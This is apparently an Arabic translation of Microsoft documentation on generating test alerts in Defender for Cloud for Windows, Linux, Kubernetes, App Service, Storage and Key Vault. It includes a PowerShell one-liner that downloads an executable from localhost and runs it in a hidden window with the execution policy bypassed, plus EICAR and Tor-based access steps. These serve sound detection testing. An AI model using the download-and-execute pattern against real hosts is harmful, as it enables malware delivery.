التحقق من صحة التنبيهات في Microsoft Defender for Cloud
تشرح هذه المقالة كيفية التحقق من تكوين نظامك بشكل صحيح لتنبيهات Microsoft Defender for Cloud، ما يضمن أنه يمكنك مراقبة تهديدات الأمان والاستجابة لها بشكل فعال.
ما التنبيهات الأمنية؟
التنبيهات هي إعلامات ينشئها Defender for Cloud عندما يكتشف التهديدات على مواردك. فهو يعطي الأولوية للتنبيهات ويسردها بالإضافة إلى المعلومات اللازمة للتحقيق في المشكلة بسرعة. يوفر Defender for Cloud أيضا توصيات لمعالجة الهجوم.
لمزيد من المعلومات، راجع تنبيهات الأمان في Defender for Cloud وإدارة تنبيهات الأمان والاستجابة لها.
المتطلبات الأساسية
لتلقي جميع التنبيهات، يجب أن تكون أجهزتك ومساحات عمل Log Analytics المتصلة في نفس المستأجر.
توليد عينة من التنبيهات الأمنية
إذا كنت تستخدم تجربة تنبيهات المعاينة الجديدة كما هو موضح في إدارة تنبيهات الأمان والاستجابة لها في Microsoft Defender for Cloud، يمكنك إنشاء نماذج تنبيهات من صفحة تنبيهات الأمان في مدخل Microsoft Azure.
استخدم نماذج التنبيهات من أجل:
- تقييم قيمة وقدرات خطط Microsoft Defender.
- تحقق من صحة أي تكوينات أجريتها لتنبيهات الأمان (مثل تكامل SIEM وأتمتة سير العمل وإعلامات البريد الإلكتروني).
لإنشاء نماذج التنبيهات:
- كمستخدم مع دور مساهم الاشتراك، من شريط الأدوات في صفحة تنبيهات الأمان، حدد Sample alerts.
- اختر الاشتراك.
- حدد خطة (خطط) Microsoft Defender ذات الصلة التي تريد رؤية التنبيهات لها.
- حدد Create sample alerts.
يظهر إعلام يخبرك بإنشاء نماذج التنبيهات:
بعد بضع دقائق، تظهر التنبيهات على صفحة تنبيهات الأمان. كما تظهر في أي مكان آخر قمت بتكوينه لتلقي تنبيهات أمان Microsoft Defender for Cloud (SIEMs المتصلة وإعلامات البريد الإلكتروني وما إلى ذلك).
تلميح
التنبيهات لمصادر تمت محاكاتها.
محاكاة التنبيهات على أجهزة Azure الظاهرية (Windows)
بعد تثبيت عامل Microsoft Defender لنقطة النهاية على جهازك كجزء من تكامل Defender for Servers، اتبع هذه الخطوات من الجهاز حيث تريد أن تكون المورد الذي تمت مهاجمته للتنبيه.
افتح موجه سطر أوامر غير مقيد على الجهاز وقم بتشغيل البرنامج النصي:
انتقل إلى البدء واكتب
cmd
.حدد موجه الأوامر بزر الماوس الأيمن وحدد تشغيل كمسؤول.
في المطالبة، انسخ الأمر التالي وقم بتشغيله:
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\test-MDATP-test\invoice.exe');Start-Process 'C:\test-MDATP-test\invoice.exe'
.يتم إغلاق نافذة موجه الأوامر تلقائيا. إذا نجحت، يجب أن يظهر تنبيه جديد في شفرة Defender for Cloud Alerts في 10 دقائق.
يجب أن يظهر سطر الرسالة في مربع PowerShell مشابها لكيفية تقديمه هنا:
بدلا من ذلك، يمكنك استخدام سلسلة اختبار EICAR لإجراء هذا الاختبار: إنشاء ملف نصي، ولصق سطر EICAR، وحفظ الملف كملف قابل للتنفيذ إلى محرك الأقراص المحلي لجهازك.
إشعار
عند مراجعة تنبيهات الاختبار لنظام التشغيل Windows، تأكد من تمكين Defender لنقطة النهاية مع تمكين الحماية في الوقت الحقيقي. تعرف على كيفية التحقق من صحة هذا التكوين.
محاكاة التنبيهات على أجهزة Azure الظاهرية (Linux)
بعد تثبيت عامل Microsoft Defender لنقطة النهاية على جهازك كجزء من تكامل Defender for Servers، اتبع الخطوات التالية من الجهاز الذي تريد أن يكون المورد الذي تمت مهاجمته للتنبيه:
- افتح نافذة Terminal، وانسخ الأمر التالي وقم بتشغيله:
curl -O https://secure.eicar.org/eicar.com.txt
- يتم إغلاق نافذة موجه الأوامر تلقائيا. إذا نجحت، يجب أن يظهر تنبيه جديد في شفرة Defender for Cloud Alerts في 10 دقائق.
إشعار
عند مراجعة تنبيهات الاختبار لنظام Linux، تأكد من تمكين Defender لنقطة النهاية مع تمكين الحماية في الوقت الحقيقي. تعرف على كيفية التحقق من صحة هذا التكوين.
محاكاة التنبيهات على Kubernetes
يوفر Defender for Containers تنبيهات أمان لمجموعاتك وعقد نظام المجموعة الأساسية. وهو يحقق ذلك من خلال مراقبة مستوى التحكم (خادم API) وعبء العمل المعبأة في حاويات.
يمكنك محاكاة التنبيهات لمستوى التحكم وعبء العمل باستخدام أداة محاكاة تنبيهات Kubernetes.
تعرف على المزيد حول الدفاع عن عقد Kubernetes ومجموعاتها باستخدام Microsoft Defender for Containers.
محاكاة التنبيهات لخدمة التطبيقات
يمكنك محاكاة التنبيهات للموارد التي تعمل على App Service.
- قم بإنشاء موقع ويب جديد وانتظر 24 ساعة حتى يتم تسجيله مع Defender for Cloud، أو استخدم موقع ويب موجود.
- بمجرد إنشاء موقع الويب، قم بالوصول إليه باستخدام عنوان URL التالي:
- يتم إنشاء تنبيه في غضون ساعة إلى ساعتين تقريبا.
محاكاة التنبيهات ل Storage ATP (الحماية المتقدمة من التهديدات)
انتقل إلى حساب تخزين تم تمكين Azure Defender for Storage فيه.
حدد علامة التبويب Containers في الشريط الجانبي.
انتقل إلى حاوية موجودة أو أنشئ حاوية جديدة.
تحميل ملف إلى تلك الحاوية. تجنب تحميل أي ملف قد يحتوي على بيانات حساسة.
حدد الملف الذي تم تحميله بزر الماوس الأيمن وحدد Generate SAS.
حدد زر رمز SAS المميز وعنوان URL الذي تم إنشاؤه (لا حاجة لتغيير أي خيارات).
نسخ عنوان URL الذي أنشئ لـ SAS.
افتح متصفح Tor، الذي يمكنك تنزيله هنا.
في مستعرض Tor، الانتقال إلى SAS URL. يجب أن تشاهد الآن الملف الذي تم تحميله ويمكنك تنزيله.
اختبار تنبيهات AppServices
لمحاكاة تنبيه EICAR لخدمات التطبيقات:
- ابحث عن نقطة نهاية HTTP لموقع الويب إما عن طريق الانتقال إلى شفرة مدخل Microsoft Azure لموقع App Services على الويب أو باستخدام إدخال DNS المخصص المقترن بموقع الويب هذا. (تحتوي نقطة نهاية URL الافتراضية لموقع Azure App Services على اللاحقة
https://XXXXXXX.azurewebsites.net
). يجب أن يكون موقع الويب موقعا موجودا وليس موقعا تم إنشاؤه قبل محاكاة التنبيه. - ابحث عن نقطة نهاية HTTP لموقع الويب إما عن طريق الانتقال إلى شفرة مدخل Microsoft Azure لموقع App Services على الويب أو باستخدام إدخال DNS المخصص المقترن بموقع الويب هذا. (تحتوي نقطة نهاية URL الافتراضية لموقع Azure App Services على اللاحقة
https://XXXXXXX.azurewebsites.net
). يجب أن يكون موقع الويب موقعا موجودا وليس موقعا تم إنشاؤه قبل محاكاة التنبيه. - استعرض للوصول إلى عنوان URL لموقع الويب وأضف اللاحقة الثابتة التالية:
/This_Will_Generate_ASC_Alert
. يجب أن يبدو عنوان URL كما يلي:https://XXXXXXX.azurewebsites.net/This_Will_Generate_ASC_Alert
. قد يستغرق إنشاء التنبيه بعض الوقت (~1.5 ساعة).
التحقق من صحة Azure Key Vault Threat Detection
- إذا لم يكن لديك Key Vault تم إنشاؤه بعد، فتأكد من إنشاء واحد.
- بعد إنشاء Key Vault والسر، انتقل إلى جهاز ظاهري لديه حق الوصول إلى الإنترنت وقم بتنزيل متصفح TOR.
- تثبيت متصفح TOR على الجهاز الظاهري الخاص بك.
- بعد التثبيت، افتح المستعرض العادي، وسجل الدخول إلى مدخل Microsoft Azure، وادخل إلى صفحة Key Vault. حدد عنوان URL المميز وانسخ العنوان.
- افتح TOR والصق عنوان URL هذا (تحتاج إلى المصادقة مرة أخرى للوصول إلى مدخل Microsoft Azure).
- بعد الوصول، يمكنك أيضا تحديد خيار Secrets في الجزء الأيمن.
- في متصفح TOR، سجل الخروج من مدخل Microsoft Azure وأغلق المستعرض.
- بعد مرور بعض الوقت، يقوم Defender for Key Vault بتشغيل تنبيه بمعلومات مفصلة حول هذا النشاط المشبوه.
الخطوات التالية
قدمت لك هذه المقالة عملية التحقق من صحة التنبيهات. الآن بعد أن أصبحت على دراية بهذا التحقق من الصحة، استكشف المقالات التالية:
- التحقق من اكتشاف تهديدات Azure Key Vault في Microsoft Defender for Cloud
- إدارة التنبيهات الأمنية والاستجابة لها في Microsoft Defender for Cloud - تعرف على كيفية إدارة التنبيهات والاستجابة لحوادث الأمان في Defender for Cloud.
- التعرف على تنبيهات الأمان في Microsoft Defender for Cloud